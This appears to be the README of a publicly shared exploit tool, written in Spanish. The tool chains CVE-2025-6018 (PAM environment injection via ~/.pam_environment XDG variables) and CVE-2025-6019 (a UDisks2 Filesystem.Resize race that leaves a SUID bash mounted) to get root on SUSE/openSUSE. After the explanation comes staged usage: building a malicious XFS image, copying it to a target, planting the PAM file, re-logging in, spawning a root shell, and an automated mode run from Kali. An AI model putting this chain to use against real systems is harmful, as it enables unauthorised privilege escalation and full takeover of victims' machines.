
Cadena de explotación de CVE-2025-6018 a CVE-2025-6019
https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
Este exploit encadena CVE-2025-6018 y CVE-2025-6019 para lograr una escalada de privilegios local desde un usuario no privilegiado a root en sistemas SUSE/openSUSE vulnerables. CVE-2025-6018 es una vulnerabilidad de inyección de variables de entorno en PAM (Módulos de Autenticación Conectables) en pam_env.so (versiones 1.3.0-1.6.0) que permite a los usuarios envenenar su entorno de sesión a través de ~/.pam_environment usando la directiva OVERRIDE. Al manipular las variables de sesión XDG (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE), un atacante puede engañar a systemd-logind para que otorgue privilegios allow_active de PolicyKit, haciendo que la sesión SSH remota parezca una sesión física local. Una vez obtenido el estado allow_active, se puede explotar CVE-2025-6019: esta vulnerabilidad en UDisks2/libblockdev permite a los usuarios con permisos allow_active montar sistemas de archivos con opciones privilegiadas (exec, suid) a través de una condición de carrera en el método D-Bus Filesystem.Resize. Cuando se desencadena una operación de redimensionamiento en un dispositivo de bucle que contiene un sistema de archivos XFS manipulado con un binario SUID root de bash, libblockdev monta automáticamente el sistema de archivos para realizar el redimensionamiento, pero falla al desmontarlo debido al error de redimensionamiento, dejando el bash SUID accesible en /tmp/blockdev*/, el cual puede ser ejecutado para obtener un shell de root.
sudo ./ExploitChain.sh stage1 [output_path]
# Default: ./xfs.image
# Creates 300MB XFS filesystem with SUID root bash
scp xfs.image user@<target_ip>:/tmp/
./ExploitChain.sh stage2
# Creates ~/.pam_environment with malicious XDG variables
# MUST logout and login to trigger PAM processing
logout
ssh user@<target_ip>
# PAM processes ~/.pam_environment on login
# systemd-logind grants allow_active status
./ExploitChain.sh stage3 /tmp/xfs.image
# Exploits UDisks2 Filesystem.Resize bug
# Mounts XFS image with SUID bash
# Spawns root shell
# On Kali (auto-detects root and runs stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto
# On target (auto-detects stage and runs stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image
./ExploitChain.sh help